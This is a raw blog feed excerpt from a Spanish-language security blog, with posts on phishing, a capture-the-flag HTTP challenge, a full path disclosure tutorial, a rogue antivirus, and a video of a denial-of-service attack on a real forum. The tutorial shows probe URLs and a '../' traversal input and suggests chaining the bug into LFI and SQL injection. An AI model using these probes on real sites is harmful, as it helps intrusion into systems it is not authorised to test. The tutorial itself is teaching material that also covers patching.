10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 109px;" src="http://2.bp.blogspot.com/_112F2TUuD7w/S2SXlV02MRI/AAAAAAAAADg/13TNJEdGHzw/s200/phishing4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432633718285414674" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno he intentado acceder al sitio pero ni con proxy puedo acceder al parecer se los han bajado o algo por el estilo, igual que mejor ejemplo que este para que vean como son algunos que te atacan no solo con el phishing sino también por el lado psicológico dandote algunas cosas como Advertencia 1 y usar contadores para saber cuantas te van enviando...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Creo que esto también les puede servir de ayuda para sus presentaciones aquellos que quieren mostrar temas como este... espero les sirva la entrada ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4954416823342109526?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/4954416823342109526/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4954416823342109526&amp;isPopup=true" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4954416823342109526?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4954416823342109526?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/inteto-de-hackeo-de-msn.html" title="Inteto de Hackeo de MSN" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_112F2TUuD7w/S2SSyR02wgI/AAAAAAAAADI/dhRAOuaosnI/s72-c/phishing1.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry gd:etag="W/&quot;AkYHSXY8cSp7ImA9WxBXF0w.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-8382051496263872418</id><published>2010-01-28T14:28:00.001-08:00</published><updated>2010-01-28T14:35:38.879-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-28T14:35:38.879-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking General" /><title>Superando el 3er Reto de Perverths0 - Http Hacking</title><content type="html">Bueno el Perverths0 hizo los retos de &lt;a href="http://www.dragonjar.org"&gt;DragonJAR&lt;/a&gt; mi team fue el team negro y fue el ganador, la próxima semana los retos serán hechos por nosotros, los pondré aquí también por si alguno de ustedes lo quería resolver...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Básicamente los retos fueron http hacking... Cambiar una cabecera cambiar el method y bueno los dos últimos eran Saber Programar y algo de Ingeniería Inversa...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;La tool que usé fue BurpSuite V1.3 pero ustedes pueden usar una variante que prefieran, vean el Video y comprenderán...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="400" height="225"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=8976127&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=8976127&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="225"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;p&gt;&lt;a href="http://vimeo.com/8976127"&gt;Resolver reto Número 3 de DragonJAR V1&lt;/a&gt; from &lt;a href="http://vimeo.com/user2829180"&gt;SeguridadBlanca&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno espero les sirva ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PD: Como se que si ven solo el Tercero se Perderan les dejo el link de los retos igual...&lt;br /&gt;&lt;a href="http://96.31.90.70/retodragonjar/retodragonjar/"&gt;&lt;br /&gt;http://96.31.90.70/retodragonjar/retodragonjar/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;esos son los retos ;) diviertanse si lo quieren pasar y la web no es peligrosa osea es parte de los retos...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-8382051496263872418?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/8382051496263872418/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=8382051496263872418&amp;isPopup=true" title="6 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/8382051496263872418?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/8382051496263872418?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/superando-el-3er-reto-de-perverths0.html" title="Superando el 3er Reto de Perverths0 - Http Hacking" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></entry><entry gd:etag="W/&quot;DkIBRno9eip7ImA9WxBXFE4.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-7364729796247090629</id><published>2010-01-25T07:42:00.000-08:00</published><updated>2010-01-25T07:49:17.462-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-25T07:49:17.462-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Eventos de Interes..." /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>X25 Ethical Hacking Conferences</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i50.tinypic.com/2qi7p5u.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 300px;" src="http://i50.tinypic.com/2qi7p5u.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;"X.25 Ethical Hacking Conferences"&lt;br /&gt;&lt;br /&gt;Uno de los principales eventos en Latinoamérica relacionado con la seguridad informática.&lt;br /&gt;&lt;br /&gt;El "X.25 Ethical Hacking Conferences" permitirá reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.&lt;br /&gt;&lt;br /&gt;Este evento se dividirá en dos etapas: los talleres de Especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de Conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus últimas investigaciones y experiencias en el área.&lt;br /&gt;&lt;br /&gt;Las Conferencias y los talleres de Seguridad Informática se llevarán a cabo del&lt;br /&gt;&lt;br /&gt;23 y 24 de Octubre del 2010&lt;br /&gt;&lt;br /&gt;Sede: Xalapa, Ver. México&lt;br /&gt;&lt;br /&gt;Si quieres mas información entra directamente a la web dando click &lt;a href="http://x25sec.ccat.edu.mx/"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dedalo&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-7364729796247090629?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/7364729796247090629/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=7364729796247090629&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/7364729796247090629?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/7364729796247090629?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/x25-ethical-hacking-conferences.html" title="X25 Ethical Hacking Conferences" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;D04CRHkyfyp7ImA9WxBXE0U.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-3920392311371766081</id><published>2010-01-24T18:12:00.000-08:00</published><updated>2010-01-24T18:19:25.797-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-24T18:19:25.797-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="full path disclosure" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="pen-test" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking General" /><title>MK-Portal Bugged FPD</title><content type="html">Bueno la comunidad hispabyte, excelente comunidad tenía como portal MkPortal, haciendo unos tests pude sacarle un FPD, ya está reparado pero de todas maneras les dejo el video de como muchas veces hay software conocido con el que podemos sacar rutas locales del servidor, esto puede servir a la hora de una auditoría en el caso que a nivel web no encontremos errores críticos, no se olviden siempre de poner los display errors en off y pues filtren este tipo de bugs...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;aca les dejo un videito que hice...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="400" height="300"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=8957354&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=8957354&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;p&gt;&lt;a href="http://vimeo.com/8957354"&gt;Full Path Disclosure&lt;/a&gt; from &lt;a href="http://vimeo.com/user2829180"&gt;SeguridadBlanca&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-3920392311371766081?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/3920392311371766081/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=3920392311371766081&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3920392311371766081?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3920392311371766081?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/mk-portal-bugged-fpd.html" title="MK-Portal Bugged FPD" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;A04NQ3s5eCp7ImA9WxBXE0o.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-7610938400786717616</id><published>2010-01-24T16:37:00.000-08:00</published><updated>2010-01-24T16:39:52.520-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-24T16:39:52.520-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="zero bits" /><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="full path disclosure" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><title>[Pentesting] Full Path Disclosure By Zero Bits</title><content type="html">&lt;br&gt;&lt;br&gt;.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;0x01. Introducción&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;Bueno, me les presento, algunos ya me deben conocer, pero igual a los que no. Estoy en la RED bajo el seudónimo de  Zero Bits, pero mi nombre real es DAVID, tengo 15 años, recién cumplidos el 21 de este MES XD (Octubre), soy Venezolano y ahorita ando sin team jejeje.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;En este mini-tutorial, MEJORADO de la versión anterior, les hablare un poco sobre una vulnerabilidad muy vista, pero no muy peligrosa, llamada: Full Path Disclosure.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Continuemos…&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;0x02. ¿Qué es Full Path Disclosure o FPD? – ¿Por que se produce? – ¿Como saber si es vulnerable?&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Como dije arriba, esta vulnerabilidad muy vista, pero no muy peligrosa, sirve más que todo para ingeniar otros ataques como LFI. ya que por eso mismo (no es muy peligrosa), muchos administradores no le hacen caso y no las tapan. &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Esta vulnerabilidad, se produce más que todo por la mala programación de variables, agregándole cualquier cosa innecesaria y por eso no tiene ningún tipo validación de protección.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Para saber si un servidor es vulnerable, tendríamos que agregar en cualquier link con una estructura como esta; &lt;a href="http://www.diosdelared.com/redirect.php?go=http://localhost/fpd.php?var=test" target="link"&gt;http://localhost/fpd.php?var=test&lt;/a&gt; cualquier arreglo que se nos ocurra: &lt;a href="http://www.diosdelared.com/redirect.php?go=http://localhost/fpd.php?var=aaaaaaaaahggg" target="link"&gt;http://localhost/fpd.php?var=aaaaaaaaahggg&lt;/a&gt;. Sabemos que es vulnerable, si el servidor nos tira algo como esto (ejemplo real):&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;[QUOTE]&lt;br&gt;&lt;br /&gt;Fatal error: Call to undefined function sql_query() in E:\www\webvulnerable\includes\cargar_config.php on line 15[/QUOTE]&lt;/b&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Esta era una web que andaba testeando (no les diré el link, para que no nos regañen, pero  los bugs ya fueron reportados) junto con un amigo, y pude notar que tenia los directorios abiertos y podía viajar por los archivos del servidor, al estar en el directorio “/includes/” pude ver el archivo llamado “cargar_config.php”, me metí y no era necesario agregar un arreglo, ya que estaba el error hay.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Otra cosa, al poner un ARREGLO cualquiera, no solo nos tirara, un “FATAL ERROR”, también nos podría tirar otros error como los de SQL Injection como los “warnings”. Muchos han podido notar que al agregar un ' en un servidor vulnerable, nos tira un ERROR SQL y un directorio completo donde se encuentra el fichero vulnerable, eso es también es FULL PATH DISCLOSURE.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;0x04. Alguna forma de aprovecharse&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Podemos notar, un directorio completo:&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;[QUOTE]&lt;br&gt;&lt;br /&gt;E:\www\webvulnerable\includes\cargar_config.php[/QUOTE]&lt;/b&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Imaginemos que la estructura del archivo vulnerable era de este tipo, y se encontraba en la parte física de la pagina: “&lt;a href="http://www.diosdelared.com/redirect.php?go=http://localhost/fpd.php?var=%E2%80%9D" target="link"&gt;http://localhost/fpd.php?var=”&lt;/a&gt;. Como dije arriba, FPD (Full Path Disclosure) es una vulnerabilidad, que muestra el PATH (Directorio), completo a donde se encuentra el error, y esta nos sirve nada mas como una HERRAMIENTA de AYUDA para construir otros ataques.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Por ejemplo, podemos (claro, si la web es vulnerable), realizar un ataque LFI:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;a href="http://www.diosdelared.com/redirect.php?go=http://localhost/fpd.php?var=../" target="link"&gt;http://localhost/fpd.php?var=../&lt;/a&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Ya que tendríamos todo un path, ya tendríamos una mejor idea, de cómo realizar un ataque LFI claro.&lt;br&gt;&lt;br /&gt;Una forma buena, es realizar un LOAD_FILE, con el método SQL Injection.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Otros métodos buenos, son que a la hora de mostrar un PATH, nos tire directorios buenos como (admin, PANEL DE ADMINISTRACION, includes, scripts, entre otros peligrosos), y ver si están abierto, para sacar mucha mas info. &lt;br&gt;&lt;br /&gt;Este método, es muy fácil, no tiene mucha ciencia, pero puede que en algunos casos nos sirva.&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;&lt;br&gt;&lt;br /&gt;0x05. Parchando.&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Este bug, es fácil de reparar, ya que en la mayoría de los casos, se debe a la flojera de un administrador, si no es un “sistema web” y es un servidor web normal, podríamos tener un código vulnerable diferente a los otros, por eso podemos analizarlo y ver donde esta nuestro error.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Una forma fácil, es modificando el archivo “.htaccess” y poner los códigos “display_errors” en OFF para que no nos muestre error webs:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;display_errors = Off&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;&lt;br&gt;&lt;br /&gt;0x05. Conclusion&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Al llegar al final de este tutorial, podemos ver como un simple bug, puede llegar a ser una buena herramienta para crear otro tipo de ataques, por eso es mejor mantenerte al tanto de nuevos bugs y taparlos hay mismo, ya que por la flojera o la confianza tuya, podemos tener intruso en nuestros servidores. Ten en cuenta esto:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;i&gt;No existe código 100% seguro&lt;/i&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;Autor:&lt;/b&gt; Zero Bits&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Fecha:&lt;/b&gt; 23/10/09&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-7610938400786717616?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/7610938400786717616/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=7610938400786717616&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/7610938400786717616?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/7610938400786717616?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/pentesting-full-path-disclosure-by-zero.html" title="[Pentesting] Full Path Disclosure By Zero Bits" /><author><name>Zero Bits</name><uri>http://www.blogger.com/profile/17744207739622178280</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="15367576321469896738" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;AkUNSHs_eSp7ImA9WxBXEUU.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4985008245107648152</id><published>2010-01-22T10:45:00.000-08:00</published><updated>2010-01-22T11:24:59.541-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-22T11:24:59.541-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Informatica" /><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><category scheme="http://www.blogger.com/atom/ns#" term="Virus y Malware" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Cuando Nos ataca un Rogue Software</title><content type="html">Hace un Tiempo Un Amigo mio me dijo que su Anti Virus no le detectaba ningun Virus pero a cada rato le saltaban ventanas de un antivirus como de Windows que decía que tenía muchos troyanos...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pues Decidí hacer un pequeño análisis de lo que era y pues di con esto...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Era Rogue Software, Aquí les dejo unas capturas de pantalla del Software que infectó la PC de mi amigo...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i46.tinypic.com/116rif9.jpg" width="400"&gt;&lt;/img&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i46.tinypic.com/71qtqh.jpg" width="400"&gt;&lt;/img&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i49.tinypic.com/i1cins.jpg" width="400"&gt;&lt;/img&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como pueden observar se ven como advertencias reales sin embargo no lo sen si prestamos atención a la primera imagen en el título del programa dice PC Live Guard, ahora con ayuda de nuestro queridísimo google busquemos:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.google.com.pe/#hl=es&amp;source=hp&amp;q=PC+Live+Guard&amp;btnG=Buscar+con+Google&amp;meta=&amp;aq=f&amp;oq=PC+Live+Guard&amp;fp=1"&gt;PC Live Guard&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.411-spyware.com/es/eliminar-pc-live-guard"&gt;&lt;br /&gt;Primer Resultado&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora como se dan cuenta en el primer resultado encontramos un breve resumen de que es el PC Live Guard y un tutorial de Eliminación.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El tutorial que yo vi para la eliminación y seguí fue &lt;a href="http://www.bleepingcomputer.com/virus-removal/remove-pc-live-guard"&gt;este&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Espero les sirva esta anecdota para cuando les pase algo parecido en la PC, esto le pasó a el por hacer una busqueda como &lt;a href="http://www.google.com.pe/#hl=es&amp;source=hp&amp;q=antivirus+gratis&amp;btnG=Buscar+con+Google&amp;meta=&amp;aq=f&amp;oq=antivirus+gratis&amp;fp=8c94a7d7983a5065"&gt;esta&lt;/a&gt; asi que tengan cuidado que google también puede ser un arma letal de aquellos que quieren infectar internautas...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Victima de la infección y agradecimientos por las imagenes: Maurizio Spechel.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4985008245107648152?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/4985008245107648152/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4985008245107648152&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4985008245107648152?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4985008245107648152?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/cuando-nos-ataca-un-rogue-software.html" title="Cuando Nos ataca un Rogue Software" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;C0INQn86eCp7ImA9WxBXEEU.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-393834163762419503</id><published>2010-01-21T05:35:00.000-08:00</published><updated>2010-01-21T05:46:33.110-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-21T05:46:33.110-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="D.O.S" /><category scheme="http://www.blogger.com/atom/ns#" term="diosdelared" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Denial Of Service a www.elhacker.net</title><content type="html">&lt;a href="http://www.diosdelared.com"&gt;Diosdelared&lt;/a&gt; desde siempre ha sido un lugar de donde salen bugs, exploits, tutos, etc y hoy vi lo que sinceramente veia bien difícil, un VIDEO en el que se le hace un DENIAL of Service a ElHacker.Net sin mas que decirles pues...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;VIDEO:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/1hhVXry3BkU&amp;hl=es_ES&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/1hhVXry3BkU&amp;hl=es_ES&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="400" height="320"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hielasangre.diosdelared.com"&gt;&lt;br /&gt;Blog del Creador del Video&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hielasangre.diosdelared.com/?coment=5256"&gt;&lt;br /&gt;Link directo&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno pues el video lo dice todo...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-393834163762419503?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/393834163762419503/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=393834163762419503&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/393834163762419503?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/393834163762419503?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/denial-of-service-wwwelhackernet.html" title="Denial Of Service a www.elhacker.net" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;DkcMQ3c_cCp7ImA9WxBXEE8.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-7664767195655824575</id><published>2010-01-20T11:18:00.000-08:00</published><updated>2010-01-20T13:48:02.948-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-20T13:48:02.948-08:00</app:edited><category 